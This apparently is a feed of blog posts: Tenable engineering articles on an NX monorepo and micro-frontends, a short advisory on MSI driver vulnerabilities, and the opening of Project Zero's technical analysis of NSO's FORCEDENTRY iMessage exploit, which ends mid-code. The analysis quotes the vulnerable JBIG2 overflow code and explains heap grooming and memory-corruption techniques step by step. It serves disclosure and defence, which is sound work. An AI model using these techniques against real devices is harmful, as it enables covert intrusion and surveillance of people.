- Design System website — The website (responsible for documenting the components) was moved to live alongside the Tenable.io application in a directory called apps/design-system.
The following diagram shows how we created the new monorepo based on these changes.
It’s important to note that at this point, we made a clear distinction between applications and libraries. This distinction is important because we wanted to ensure a clear import order: that is, we wanted applications to be able to consume libraries but never the other way around.
Leveraging NX
In addition to moving the design system, we also wanted the ability to only rebuild applications and libraries based on what was changed. In a monorepo where you may end up having a large number of applications and libraries, this type of functionality is critical to ensure your system doesn’t grow slower over time.
Let’s use an example to demonstrate the intended functionality: In our example, we have a component that is initially only imported by the Design System site. If an engineer changes that component, then we only want to rebuild the Design System because that’s the only place that was impacted by the change. However, if Tenable.io was leveraging that component as well, then both applications would need to be rebuilt. To manage this complexity, we rebuilt the repository using NX.
So what is NX? NX is a set of tools that enables you to separate your libraries and applications into what NX calls “workspaces”. Think of a workspace as an area in your repository (i.e. a directory) that houses shared code (an application, a utility library, a component library, etc.). Each workspace has a series of commands that can be run against it (build, serve, lint, test, etc.). This way when a workspace is changed, the nx affected command can be run to identify any other workspace that is impacted by the update. As demonstrated here, when we change Component A (living in the design-system/components workspace) and run the affected command, NX indicates that the following three workspaces are impacted by that change: design-system/components, Tenable.io, and Design System. This means that both the Tenable.io and Design System applications are importing that component.
This type of functionality is critical for a monorepo to work as it scales in size. Without this your automation server (Jenkins in our case) would grow slower over time because it would have to rebuild, re-lint, and re-test everything whenever a change was made. If you want to learn more about how NX works, please take a look at this write up that explains some of the above concepts in more detail.
Diving Deeper
Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn more about how NX works and the way in which things can be set up. If you wish to see the code associated with the following section, you can check it out in this branch.
At this point, our repository looks something like the structure of defined workspaces below:
Apps
- design-system — The static site (built off of Gatsby) that documents our global components.
- tenable-io — Our core application that was already in the repository.
Libs
- design-system/components — A library that houses our global components.
- design-system/styles — A library that is responsible for setting up our global theme provider.
- tenable-io/common — The pre-existing shared code that the Tenable.io application was leveraging and sharing throughout the application.
To reiterate, a workspace is simply a directory in your repository that houses shared code that you want to treat as either an application or a library. The difference here is that an application is standalone in nature and shows what your consumers see, whereas a library is something that is leveraged by one or more applications (your shared code). As shown below, each workspace can be configured with a series of targets (build, serve, lint, test) that can be run against it. This way, if a change has been made that impacts the workspace and we want to build all of them, we can tell NX to run the build target (line 6) for all affected workspaces.
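A sketch of how one such workspace and its targets might be declared in workspace.json — the executor names shown are real NX executors of that era, but which ones a given workspace actually uses is an assumption:

```json
{
  "projects": {
    "design-system/components": {
      "root": "libs/design-system/components",
      "projectType": "library",
      "targets": {
        "lint": { "executor": "@nrwl/linter:eslint" },
        "test": { "executor": "@nrwl/jest:jest" },
        "build": { "executor": "@nrwl/workspace:run-commands" }
      }
    }
  }
}
```

With targets declared this way, `nx affected --target=build` runs the build target for every workspace impacted by the current change.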
At this point, our two demo applications resemble the screenshots below. As you can see, there are three library components in use. These are the black, gray, and blue colored blocks on the page. Two of these come from the design-system/components workspace (Test Component 1 & 2), and the other comes from tenable-io/common (Tenable.io Component). These components will be used to demonstrate how applications and libraries are leveraged and relate to one another in the NX framework.
The Power Of NX
Now that you know what our demo application looks like, it’s time to demonstrate the importance of NX. Before we make any updates, we want to showcase the dependency graph that NX uses when analyzing our repository. By running the command nx dep-graph, the following diagram appears and indicates how our various workspaces are related. A relationship is established when one app/lib imports from another.
We now want to demonstrate the true power and purpose of NX. We start by running the nx affected:apps and nx affected:libs commands with no active changes in our repository. As shown below, no apps or libs are returned by either of these commands. This indicates that there are no changes currently in our repository, and, as a result, nothing has been affected.
Now we will make a slight update to our test-component-1.tsx file (line 19):
If we re-run the affected commands above we see that the following apps/lib are impacted: design-system, tenable-io, and design-system/components:
Additionally, if we run nx affected:dep-graph we see the following diagram. NX is showing us the above command in visual form, which can be helpful in understanding why the change you made impacted a given application or library.
With all of this in place, we can now accomplish a great deal. For instance, a common scenario (and one of our initial goals from the previous article) is to run tests for just the workspaces actually impacted by a code change. If we change a global component, we want to run all the unit tests that may have been impacted by that change. This way, we can ensure that our update is truly backwards compatible (which gets harder and harder as a component is used in more locations). We can accomplish this by running the test target on the affected workspaces:
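The command itself is short; both spellings below are real NX invocations, with the colon form being the shorthand common at the time:

```shell
# Run the test target only for workspaces affected by the current change
nx affected --target=test

# Equivalent shorthand
nx affected:test
```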
Summary
Now you are familiar with how we set up our monorepo and incorporated the NX framework. By doing this, we were able to accomplish two of the goals we started with:
- Global components should live in close proximity to the code leveraging those components. This ensures they are flexible enough to satisfy the needs of the engineers using them.
- Updates to global components should be tested in real time against the code leveraging those components. This ensures the updates are backwards compatible and non-breaking in nature.
Once we successfully set up our monorepo and incorporated the NX framework, our next step was to break apart the Tenable.io application into a series of micro applications that could be built and deployed independently. See the next article in the series to learn how we did this and the lessons we learned along the way.
3. Introducing The Monorepo & NX was originally published in Tenable TechBlog on Medium.
2. Why We Implemented A Micro Frontend
Why We Implemented A Micro Frontend
This is post 2 of 9 in the series
- Introduction
- Why We Implemented a Micro Frontend
- Introducing the Monorepo & NX
- Introducing Module Federation
- Module Federation — Managing Your Micro-Apps
- Module Federation — Sharing Vendor Code
- Module Federation — Sharing Library Code
- Building & Deploying
- Summary
Overview
This article documents the discovery phase of our journey toward a new architecture. Like any engineering group, we didn’t simply wake up one day and decide it would be fun to rewrite our entire architecture. Rather, we found ourselves with an application that was growing exponentially in size and complexity, and discovered that our existing architecture didn’t support this type of growth for a variety of reasons. Before we dive into how we revamped our architecture to fix these issues, let’s set the stage by outlining what our architecture used to look like and where the problems existed.
Our Initial Architecture
When one of our core applications (Tenable.io) was first built, it consisted of two separate repositories:
- Design System Repository — This contained all the global components that were used by Tenable.io. Each iteration of a given component was published to a Nexus repository (our private npm repository) leveraging Lerna. Package versions were incremented following semver (ex. 1.0.0). The repository also housed a static design system site, which was responsible for documenting the components and how they were to be used.
- Tenable.io Repository — This contained a single page application built using webpack. The application itself pulled down components from the Nexus repository according to the version defined in the package.json.
This was a fairly traditional architecture and served us well for some time. Below is a simplified diagram of what this architecture looked like:
The Problem
As our application continued to grow, we created more teams to manage individual parts of the application. While this was beneficial in the sense that we were able to work at a quicker pace, it also led to a variety of issues.
Component Isolation
Due to global components living in their own repository, we began encountering an issue where components did not always work appropriately when they were integrated into the actual application. While developing a component in isolation is nice from a developmental standpoint, the reality is that the needs of an application are diverse, and typically this means that a component must be flexible enough to account for these needs. As a result, it becomes extremely difficult to determine if a component is going to work appropriately until you actually try to leverage it in your application.
Solution #1 — Global components should live in close proximity to the code leveraging those components. This ensures they are flexible enough to satisfy the needs of the engineers using them.
Component Bugs & Breaking Changes
We also encountered a scenario where a bug was introduced in a given component but was not found or realized until a later date. Since component updates were made in isolation within another repository, engineers working on the Tenable.io application would only pull in updated components when necessary. When this did occur, they were typically jumping between multiple versions at once (ex. 1.0.0 to 1.4.5). When the team discovered a bug, it may have been from one of the versions in between (ex. 1.2.2). Trying to backtrack and identify which particular version introduced the bug was a time-consuming process.
Solution #2 — Updates to global components should be tested in real time against the code leveraging those components. This ensures the updates are backwards compatible and non-breaking in nature.
One Team Blocks All Others
One of the most significant issues we faced from an architectural perspective was the blocking nature of our deployments. Even though a large number of teams worked on different areas of the application that were relatively isolated, if just one team introduced a breaking change it blocked all the other teams.
Solution #3 — Feature teams should move at their own pace, and their impact on one another should be limited as much as possible.
Slow Development
As we added more teams and more features to Tenable.io, the size of our application continued to grow, as demonstrated below.
If you’ve ever been the one responsible for managing the webpack build of your application, you’ll know that the bigger your application gets, the slower your build becomes. This is simply a result of having more code that must be compiled/re-compiled as engineers develop features. This not only impacted local development, but our Jenkins build was also getting slower over time as things grew, because it had to lint, test, and build more and more over time. We employed a number of solutions in an attempt to speed up our build, including: The DLL Plugin, SplitChunksPlugin, Tweaking Our Minification Configuration, etc. However, we began realizing that at a certain point there wasn’t much more we could do and we needed a better way to build out the different parts of the application (note: something like parallel-webpack could have helped here if we had gone down a different path).
Solution #4 — Engineers should be capable of building the application quickly for development purposes regardless of the size of the application as it grows over time. In addition, Jenkins should be capable of testing, linting, and building the application in a performant manner as the system grows.
The Solution
At a certain point, we decided that our architecture was not satisfying our needs. As a result, we made the decision to update it. Specifically, we believed that moving towards a monorepo based on a micro-frontend architecture would help us address these needs by offering the following benefits:
- Monorepo — While definitions vary, in our case a monorepo is a single repository that houses multiple applications. Moving to a monorepo would entail consolidating the Design System and the Tenable.io repositories into one. By combining them into one repository, we can ensure that updates made to components are tested in real time by the code consuming them and that the components themselves are truly satisfying the needs of our engineers.
- Micro-Frontend — As defined here, a “Micro-frontend architecture is a design approach in which a front-end app is decomposed into individual, semi-independent ‘microapps’ working loosely together.” For us, this means splitting apart the Tenable.io application into multiple micro-applications (we’ll use this term moving forward). Doing this allows teams to move at their own pace and limit their impact on one another. It also speeds up the time to build the application locally by allowing engineers to choose which micro applications to build and run.
Summary
With these things in mind, we began to develop a series of architectural diagrams and roadmaps that would enable us to move from point A to point B. Keep in mind, though, at this point we were dealing with an enterprise application that was in active development and in use by customers. For anyone who has ever been through this process, trying to revamp your architecture at this stage is somewhat akin to changing a tyre while driving.
As a result, we had to ensure that as we moved towards this new architecture, our impact on the normal development and deployment of the application was minimal. While there were plenty of bumps and bruises along the way, which we will share as we go, we were able to accomplish this through a series of phases. In the following articles, we will walk through these phases. See the next article to learn how we moved to a monorepo leveraging the NX framework.
2. Why We Implemented A Micro Frontend was originally published in Tenable TechBlog on Medium.
1. Introduction: Our Journey Implementing a Micro Frontend
Introduction: Our Journey Implementing a Micro Frontend
In the current world of frontend development, picking the right architecture and tech stack can be challenging. With all of the libraries, frameworks, and technologies available, it can seem (to say the least) overwhelming. Learning how other companies tackle a particular challenge is always beneficial to the community as a whole. Therefore, in this series, we hope to share the lessons we have learned in creating a successful micro-frontend architecture.
What This Series is About
While the term “micro-frontend” has been around for some time, the manner in which you build this type of architecture is ever evolving. New solutions and strategies are introduced all the time, and picking the one that is right for you can seem like an impossible task. This series focuses on creating a micro-frontend architecture by leveraging the NX framework and webpack’s module federation (released in webpack 5). We’ll detail each of our phases from start to finish, and document what we encountered along the way.
The series is broken up into the following articles:
- Why We Implemented a Micro Frontend — Explains the discovery phase shown in the infographic above. It talks about where we started and, specifically, what our architecture used to look like and where the problems within that architecture existed. It then goes on to describe how we planned to solve our problems with a new architecture.
- Introducing the Monorepo and NX — Documents the initial phase of updating our architecture, during which we created a monorepo built off the NX framework. This article focuses on how we leverage NX to identify which part of the repository changed, allowing us to only rebuild that portion.
- Introducing Module Federation — Documents the next phase of updating our architecture, where we broke up our main application into a series of smaller applications using webpack’s module federation.
- Module Federation — Managing Your Micro-Apps — Focuses on how we enhanced our initial approach to building and serving applications using module federation, namely by consolidating the related configurations and logic.
- Module Federation — Sharing Vendor Code — Details the importance of sharing vendor library code between applications and some related best practices.
- Module Federation — Sharing Library Code — Explains the importance of sharing custom library code between applications and some related best practices.
- Building and Deploying — Documents the final phase of our new architecture where we built and deployed our application utilizing our new micro-frontend model.
- Summary — Reviews everything we discussed and provides some key takeaways from this series.
Who is This For?
If you find yourself in any of the categories below, then this series is for you:
- You’re an engineer just getting started, but you have a strong interest in architecture.
- You’re a seasoned engineer managing an ever-growing codebase that keeps getting slower.
- You’re a technical director and you’d like to see an alternative to how your teams work and ship their code.
- You work with engineers on a daily basis, and you’d really like to understand what they mean when they say a micro-frontend.
- You really just like to read!
In conclusion, read on if you want a better understanding of how you can successfully implement a micro-frontend architecture from start to finish.
How Articles are Structured
Each article in the series is split into two primary parts. The first half (overview, problem, and solution) gives you a high level understanding of the topic of discussion. If you just want to view the “cliff notes”, then these sections are for you.
The second half (diving deeper) is more technical in nature, and is geared towards those who wish to see how we actually implemented the solution. For most of the articles in this series, this section includes a corresponding demo repository that further demonstrates the concepts within the article.
Summary
So, let’s begin! Before we dive into how we updated our architecture, it’s important to discuss the issues we faced that led us to this decision. Check out the next article in the series to get started.
1. Introduction: Our Journey Implementing a Micro Frontend was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.
Merry Hackmas: multiple vulnerabilities in MSI’s products
This blog post serves as an advisory for a couple of MSI’s products that are affected by multiple high-severity vulnerabilities in the driver components they ship with. All the vulnerabilities are triggered by sending specific IOCTL requests and allow an attacker to: directly interact with physical memory via the MmMapIoSpace function call, mapping physical memory […]
The post Merry Hackmas: multiple vulnerabilities in MSI’s products appeared first on VoidSec.
A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution
Posted by Ian Beer & Samuel Groß of Google Project Zero
We want to thank Citizen Lab for sharing a sample of the FORCEDENTRY exploit with us, and Apple’s Security Engineering and Architecture (SEAR) group for collaborating with us on the technical analysis. The editorial opinions reflected below are solely Project Zero’s and do not necessarily reflect those of the organizations we collaborated with during this research.
Earlier this year, Citizen Lab managed to capture an NSO iMessage-based zero-click exploit being used to target a Saudi activist. In this two-part blog post series we will describe for the first time how an in-the-wild zero-click iMessage exploit works.
Based on our research and findings, we assess this to be one of the most technically sophisticated exploits we've ever seen, further demonstrating that the capabilities NSO provides rival those previously thought to be accessible to only a handful of nation states.
The vulnerability discussed in this blog post was fixed on September 13, 2021 in iOS 14.8 as CVE-2021-30860.
NSO
NSO Group is one of the highest-profile providers of "access-as-a-service", selling packaged hacking solutions which enable nation state actors without a home-grown offensive cyber capability to "pay-to-play", vastly expanding the number of nations with such cyber capabilities.
For years, groups like Citizen Lab and Amnesty International have been tracking the use of NSO's mobile spyware package "Pegasus". Despite NSO's claims that they "[evaluate] the potential for adverse human rights impacts arising from the misuse of NSO products", Pegasus has been linked to the hacking of the New York Times journalist Ben Hubbard by the Saudi regime, the hacking of human rights defenders in Morocco and Bahrain, the targeting of Amnesty International staff and dozens of other cases.
Last month the United States added NSO to the "Entity List", severely restricting the ability of US companies to do business with NSO and stating in a press release that "[NSO's tools] enabled foreign governments to conduct transnational repression, which is the practice of authoritarian governments targeting dissidents, journalists and activists outside of their sovereign borders to silence dissent."
Citizen Lab was able to recover these Pegasus exploits from an iPhone and therefore this analysis covers NSO's capabilities against iPhone. We are aware that NSO sells similar zero-click capabilities which target Android devices; Project Zero does not have samples of these exploits but if you do, please reach out.
From One to Zero
In previous cases such as the Million Dollar Dissident from 2016, targets were sent links in SMS messages:
Screenshots of Phishing SMSs reported to Citizen Lab in 2016
source: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
The target was only hacked when they clicked the link, a technique known as a one-click exploit. Recently, however, it has been documented that NSO is offering their clients zero-click exploitation technology, where even very technically savvy targets who might not click a phishing link are completely unaware they are being targeted. In the zero-click scenario no user interaction is required: the attacker doesn't need to send phishing messages, and the exploit just works silently in the background. Short of not using a device, there is no way to prevent exploitation by a zero-click exploit; it's a weapon against which there is no defense.
One weird trick
The initial entry point for Pegasus on iPhone is iMessage. This means that a victim can be targeted just using their phone number or Apple ID username.
iMessage has native support for GIF images, the typically small and low quality animated images popular in meme culture. You can send and receive GIFs in iMessage chats and they show up in the chat window. Apple wanted to make those GIFs loop endlessly rather than only play once, so very early on in the iMessage parsing and processing pipeline (after a message has been received but well before the message is shown), iMessage calls the following method in the IMTranscoderAgent process (outside the "BlastDoor" sandbox), passing any image file received with the extension .gif:
[IMGIFUtils copyGifFromPath:toDestinationPath:error]
Looking at the selector name, the intention here was probably to just copy the GIF file before editing the loop count field, but the semantics of this method are different. Under the hood it uses the CoreGraphics APIs to render the source image to a new GIF file at the destination path. And just because the source filename has to end in .gif, that doesn't mean it's really a GIF file.
The ImageIO library, as detailed in a previous Project Zero blogpost, is used to guess the correct format of the source file and parse it, completely ignoring the file extension. Using this "fake gif" trick, over 20 image codecs are suddenly part of the iMessage zero-click attack surface, including some very obscure and complex formats, remotely exposing probably hundreds of thousands of lines of code.
Note: Apple inform us that they have restricted the available ImageIO formats reachable from IMTranscoderAgent starting in iOS 14.8.1 (26 October 2021), and completely removed the GIF code path from IMTranscoderAgent starting in iOS 15.0 (20 September 2021), with GIF decoding taking place entirely within BlastDoor.
A PDF in your GIF
NSO uses the "fake gif" trick to target a vulnerability in the CoreGraphics PDF parser.
PDF was a popular target for exploitation around a decade ago, due to its ubiquity and complexity. Plus, the availability of javascript inside PDFs made development of reliable exploits far easier. The CoreGraphics PDF parser doesn't seem to interpret javascript, but NSO managed to find something equally powerful inside the CoreGraphics PDF parser...
Extreme compression
In the late 1990s, bandwidth and storage were much more scarce than they are now. It was in that environment that the JBIG2 standard emerged. JBIG2 is a domain-specific image codec designed to compress images where pixels can only be black or white.
It was developed to achieve extremely high compression ratios for scans of text documents and was implemented and used in high-end office scanner/printer devices like the Xerox WorkCentre device shown below. If you used the scan-to-PDF functionality of a device like this a decade ago, your PDF likely had a JBIG2 stream in it.
A Xerox WorkCentre 7500 series multifunction printer, which used JBIG2
for its scan-to-pdf functionality
source: https://www.office.xerox.com/en-us/multifunction-printers/workcentre-7545-7556/specifications
The PDF files produced by those scanners were exceptionally small, perhaps only a few kilobytes. There are two novel techniques which JBIG2 uses to achieve these extreme compression ratios which are relevant to this exploit:
Technique 1: Segmentation and substitution
Effectively every text document, especially those written in languages with small alphabets like English or German, consists of many repeated letters (also known as glyphs) on each page. JBIG2 tries to segment each page into glyphs then uses simple pattern matching to match up glyphs which look the same:
Simple pattern matching can find all the shapes which look similar on a page,
in this case all the 'e's
JBIG2 doesn't actually know anything about glyphs and it isn't doing OCR (optical character recognition). A JBIG2 encoder is just looking for connected regions of pixels and grouping similar-looking regions together. The compression algorithm simply substitutes all sufficiently similar-looking regions with a copy of just one of them:
Replacing all occurrences of similar glyphs with a copy of just one often yields a document which is still quite legible and enables very high compression ratios
In this case the output is perfectly readable but the amount of information to be stored is significantly reduced. Rather than needing to store all the original pixel information for the whole page you only need a compressed version of the "reference glyph" for each character and the relative coordinates of all the places where copies should be made. The decompression algorithm then treats the output page like a canvas and "draws" the exact same glyph at all the stored locations.
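The decompression step described above can be sketched in a few lines. This is an illustrative model, not Xpdf's actual code: `Bitmap`, `Placement` and `drawGlyphs` are made-up names, and pixels are stored one per byte for clarity rather than packed into bits.

```cpp
#include <cstdint>
#include <vector>

// Sketch of substitution-based decompression: the page canvas is rebuilt
// by stamping one reference glyph bitmap at every recorded (x, y)
// position. 1 = black pixel, 0 = white.
struct Bitmap {
    int w, h;
    std::vector<uint8_t> px;          // row-major, one byte per pixel
    Bitmap(int w_, int h_) : w(w_), h(h_), px(w_ * h_, 0) {}
    uint8_t get(int x, int y) const { return px[y * w + x]; }
    void set(int x, int y, uint8_t v) { px[y * w + x] = v; }
};

struct Placement { int x, y; };       // where one glyph copy is drawn

// Stamp `glyph` onto `page` at every placement, OR-ing pixels in.
void drawGlyphs(Bitmap &page, const Bitmap &glyph,
                const std::vector<Placement> &places) {
    for (const Placement &p : places)
        for (int y = 0; y < glyph.h; ++y)
            for (int x = 0; x < glyph.w; ++x)
                if (p.x + x < page.w && p.y + y < page.h)
                    page.set(p.x + x, p.y + y,
                             page.get(p.x + x, p.y + y) | glyph.get(x, y));
}
```

The stored data is then just one compressed glyph plus a list of coordinates, which is why the compression ratio is so high.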
There's a significant issue with such a scheme: it's far too easy for a poor encoder to accidentally swap similar looking characters, and this can happen with interesting consequences. D. Kriesel's blog has some motivating examples where PDFs of scanned invoices have different figures or PDFs of scanned construction drawings end up with incorrect measurements. These aren't the issues we're looking at, but they are one significant reason why JBIG2 is not a common compression format anymore.
Technique 2: Refinement coding
As mentioned above, the substitution based compression output is lossy. After a round of compression and decompression the rendered output doesn't look exactly like the input. But JBIG2 also supports lossless compression as well as an intermediate "less lossy" compression mode.
It does this by also storing (and compressing) the difference between the substituted glyph and each original glyph. Here's an example showing a difference mask between a substituted character on the left and the original lossless character in the middle:
Using the XOR operator on bitmaps to compute a difference image
In this simple example the encoder can store the difference mask shown on the right, then during decompression the difference mask can be XORed with the substituted character to recover the exact pixels making up the original character. There are some more tricks outside of the scope of this blog post to further compress that difference mask using the intermediate forms of the substituted character as a "context" for the compression.
Rather than completely encoding the entire difference in one go, it can be done in steps, with each iteration using a logical operator (one of AND, OR, XOR or XNOR) to set, clear or flip bits. Each successive refinement step brings the rendered output closer to the original and this allows a level of control over the "lossiness" of the compression. The implementation of these refinement coding steps is very flexible and they are also able to "read" values already present on the output canvas.
A JBIG2 stream
Most of the CoreGraphics PDF decoder appears to be Apple proprietary code, but the JBIG2 implementation is from Xpdf, the source code for which is freely available.
The JBIG2 format is a series of segments, which can be thought of as a series of drawing commands executed sequentially in a single pass. The CoreGraphics JBIG2 parser supports 19 different segment types, which include operations like defining a new page, decoding a Huffman table or rendering a bitmap at given coordinates on the page.
Segments are represented by the class JBIG2Segment and its subclasses JBIG2Bitmap and JBIG2SymbolDict.
A JBIG2Bitmap represents a rectangular array of pixels. Its data field points to a backing-buffer containing the rendering canvas.
A JBIG2SymbolDict groups JBIG2Bitmaps together. The destination page is represented as a JBIG2Bitmap, as are individual glyphs.
JBIG2Segments can be referred to by a segment number and the GList vector type stores pointers to all the JBIG2Segments. To look up a segment by segment number the GList is scanned sequentially.
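The lookup can be sketched as follows. The types are simplified stand-ins (`JBIG2SegmentSketch` and `findSegmentSketch` are illustrative names, not the actual Xpdf classes), but the linear scan over segment numbers mirrors the behaviour described above.

```cpp
#include <cstdint>
#include <vector>

// Sketch of segment lookup: segments live in a flat list (the GList in
// Xpdf) and are found by a sequential scan over their segment numbers.
struct JBIG2SegmentSketch {
    uint32_t segNum;
    explicit JBIG2SegmentSketch(uint32_t n) : segNum(n) {}
};

JBIG2SegmentSketch *findSegmentSketch(
        std::vector<JBIG2SegmentSketch *> &segments, uint32_t segNum) {
    for (JBIG2SegmentSketch *s : segments)   // O(n) scan, as in the GList
        if (s->segNum == segNum)
            return s;
    return nullptr;                           // segment number not found
}
```

This list of segment pointers is exactly the structure the exploit later corrupts.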
The vulnerability
The vulnerability is a classic integer overflow when collating referenced segments:
Guint numSyms; // (1)
numSyms = 0;
for (i = 0; i < nRefSegs; ++i) {
  if ((seg = findSegment(refSegs[i]))) {
    if (seg->getType() == jbig2SegSymbolDict) {
      numSyms += ((JBIG2SymbolDict *)seg)->getSize();  // (2)
    } else if (seg->getType() == jbig2SegCodeTable) {
      codeTables->append(seg);
    }
  } else {
    error(errSyntaxError, getPos(),
          "Invalid segment reference in JBIG2 text region");
    delete codeTables;
    return;
  }
}
...
// get the symbol bitmaps
syms = (JBIG2Bitmap **)gmallocn(numSyms, sizeof(JBIG2Bitmap *)); // (3)

kk = 0;
for (i = 0; i < nRefSegs; ++i) {
  if ((seg = findSegment(refSegs[i]))) {
    if (seg->getType() == jbig2SegSymbolDict) {
      symbolDict = (JBIG2SymbolDict *)seg;
      for (k = 0; k < symbolDict->getSize(); ++k) {
        syms[kk++] = symbolDict->getBitmap(k); // (4)
      }
    }
  }
}
numSyms is a 32-bit integer declared at (1). By supplying carefully crafted reference segments it's possible for the repeated addition at (2) to cause numSyms to overflow to a controlled, small value.
That smaller value is used for the heap allocation size at (3) meaning syms points to an undersized buffer.
Inside the inner-most loop at (4) JBIG2Bitmap pointer values are written into the undersized syms buffer.
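The wrap-around at (2) can be demonstrated in isolation. This is a hedged sketch (`collateNumSyms` is an illustrative stand-in for the collation loop, not the real parser code): unsigned 32-bit addition is defined to wrap modulo 2^32, so attacker-chosen dictionary sizes can drive the sum around to a small value, which then becomes the allocation size at (3).

```cpp
#include <cstdint>

// Sketch of the overflow at (2)/(3): numSyms is a 32-bit unsigned
// integer, so repeated additions wrap modulo 2^32, and the allocation
// at (3) ends up far smaller than the number of pointers written at (4).
uint32_t collateNumSyms(const uint32_t *dictSizes, int n) {
    uint32_t numSyms = 0;
    for (int i = 0; i < n; ++i)
        numSyms += dictSizes[i];      // wraps on overflow
    return numSyms;
}
```

Two dictionaries of size 0x80000000 plus one of size 6 collate to just 6, so `gmallocn` would allocate room for only 6 pointers while billions get written.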
Without another trick this loop would write over 32GB of data into the undersized syms buffer, certainly causing a crash. To avoid that crash the heap is groomed such that the first few writes off of the end of the syms buffer corrupt the GList backing buffer. This GList stores all known segments and is used by the findSegments routine to map from the segment numbers passed in refSegs to JBIG2Segment pointers. The overflow causes the JBIG2Segment pointers in the GList to be overwritten with JBIG2Bitmap pointers at (4).
Conveniently, since JBIG2Bitmap inherits from JBIG2Segment, the seg->getType() virtual call succeeds even on devices where Pointer Authentication is enabled (which is used to perform a weak type check on virtual calls), but the returned type will now not be equal to jbig2SegSymbolDict, causing further writes at (4) not to be reached and bounding the extent of the memory corruption.
A simplified view of the memory layout when the heap overflow occurs showing the undersized-buffer below the GList backing buffer and the JBIG2Bitmap
Boundless unbounding
Directly after the corrupted segments GList, the attacker grooms the JBIG2Bitmap object which represents the current page (the place to where current drawing commands render).
JBIG2Bitmaps are simple wrappers around a backing buffer, storing the buffer’s width and height (in bits) as well as a line value which defines how many bytes are stored for each line.
The memory layout of the JBIG2Bitmap object showing the segnum, w, h and line fields which are corrupted during the overflow
By carefully structuring refSegs they can stop the overflow after writing exactly three more JBIG2Bitmap pointers after the end of the segments GList buffer. This overwrites the vtable pointer and the first four fields of the JBIG2Bitmap representing the current page. Due to the nature of the iOS address space layout these pointers are very likely to be in the second 4GB of virtual memory, with addresses between 0x100000000 and 0x1ffffffff. Since all iOS hardware is little endian, the w and line fields are likely to be overwritten with 0x1 (the most-significant half of a JBIG2Bitmap pointer), and the segNum and h fields with the least-significant half of such a pointer: a fairly random value, depending on heap layout and ASLR, somewhere between 0x100000 and 0xffffffff.
This gives the current destination page JBIG2Bitmap an unknown, but very large, value for h. Since that h value is used for bounds checking and is supposed to reflect the allocated size of the page backing buffer, this has the effect of "unbounding" the drawing canvas. This means that subsequent JBIG2 segment commands can read and write memory outside of the original bounds of the page backing buffer.
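A sketch of why a corrupted h "unbounds" the canvas (the `PageSketch` struct and `inBounds` helper are illustrative, not the real JBIG2Bitmap layout): bounds checks consult the stored width/height fields, which no longer agree with the real allocation once they have been overwritten.

```cpp
#include <cstdint>

// Sketch of the unbounding effect: the parser's coordinate checks trust
// the object's own w/h fields. Once h is corrupted to a huge value,
// out-of-bounds coordinates pass the check and drawing commands read
// and write past the real backing buffer.
struct PageSketch {
    uint32_t w, h, line;   // line = bytes stored per row
    uint8_t *data;         // backing buffer, really only w*h bits large
};

bool inBounds(const PageSketch &p, uint32_t x, uint32_t y) {
    return x < p.w && y < p.h;   // trusts the (corruptible) fields
}
```

With h set to a value like 0x34abcdef, virtually any y coordinate is "in bounds" as far as the parser is concerned.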
The heap groom also places the current page's backing buffer just below the undersized syms buffer, such that when the page JBIG2Bitmap is unbounded, it's able to read and write its own fields:
The memory layout showing how the unbounded bitmap backing buffer is able to reference the JBIG2Bitmap object and modify fields in it as it is located after the backing buffer in memory
By rendering 4-byte bitmaps at the correct canvas coordinates they can write to all the fields of the page JBIG2Bitmap and by carefully choosing new values for w, h and line, they can write to arbitrary offsets from the page backing buffer.
At this point it would also be possible to write to arbitrary absolute memory addresses if you knew their offsets from the page backing buffer. But how to compute those offsets? Thus far, this exploit has proceeded in a manner very similar to a "canonical" scripting language exploit which in Javascript might end up with an unbounded ArrayBuffer object with access to memory. But in those cases the attacker has the ability to run arbitrary Javascript which can obviously be used to compute offsets and perform arbitrary computations. How do you do that in a single-pass image parser?
My other compression format is turing-complete!
As mentioned earlier, the sequence of steps which implement JBIG2 refinement are very flexible. Refinement steps can reference both the output bitmap and any previously created segments, as well as render output to either the current page or a segment. By carefully crafting the context-dependent part of the refinement decompression, it's possible to craft sequences of segments where only the refinement combination operators have any effect.
In practice this means it is possible to apply the AND, OR, XOR and XNOR logical operators between memory regions at arbitrary offsets from the current page's JBIG2Bitmap backing buffer. And since that has been unbounded… it's possible to perform those logical operations on memory at arbitrary out-of-bounds offsets:
The memory layout showing how logical operators can be applied out-of-bounds
It's when you take this to its most extreme form that things start to get really interesting. What if rather than operating on glyph-sized sub-rectangles you instead operated on single bits?
You can now provide as input a sequence of JBIG2 segment commands which implement a sequence of logical bit operations to apply to the page. And since the page buffer has been unbounded those bit operations can operate on arbitrary memory.
With a bit of back-of-the-envelope scribbling you can convince yourself that with just the available AND, OR, XOR and XNOR logical operators you can in fact compute any computable function - the simplest proof being that you can create a logical NOT operator by XORing with 1 and then putting an AND gate in front of that to form a NAND gate:
An AND gate connected to one input of an XOR gate. The other XOR gate input is connected to the constant value 1, creating a NAND.
A NAND gate is an example of a universal logic gate; one from which all other gates can be built and from which a circuit can be built to compute any computable function.
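The construction is easy to verify in code. This is a sketch of the argument only, not the exploit's actual segment encoding: each function stands in for what the exploit expresses as JBIG2 refinement operators on single bits.

```cpp
// Sketch of the universality argument: with only the JBIG2 refinement
// operators (AND, OR, XOR, XNOR) and the constant 1 you can build NOT,
// and AND followed by NOT is NAND -- a universal gate from which any
// other gate (here OR, for example) can be derived.
inline int NOT(int a)         { return a ^ 1; }          // XOR with 1
inline int NAND(int a, int b) { return NOT(a & b); }     // AND, then NOT
inline int OR2(int a, int b)  { return NAND(NOT(a), NOT(b)); }
```

Checking the truth tables of `NAND` and the derived `OR2` confirms that the available operators really are enough to compute any boolean function.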
Practical circuits
JBIG2 doesn't have scripting capabilities, but when combined with a vulnerability, it does have the ability to emulate circuits of arbitrary logic gates operating on arbitrary memory. So why not just use that to build your own computer architecture and script that!? That's exactly what this exploit does. Using over 70,000 segment commands defining logical bit operations, they define a small computer architecture with features such as registers and a full 64-bit adder and comparator which they use to search memory and perform arithmetic operations. It's not as fast as Javascript, but it's fundamentally computationally equivalent.
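The kind of adder described here can be sketched with single-bit logic alone. This is illustrative C++ (the real exploit expresses each gate as JBIG2 segment commands operating on canvas bits, not as code): a 64-bit ripple-carry adder built exclusively from AND, OR and XOR.

```cpp
#include <cstdint>

// Sketch of a 64-bit ripple-carry adder using only single-bit AND/OR/XOR
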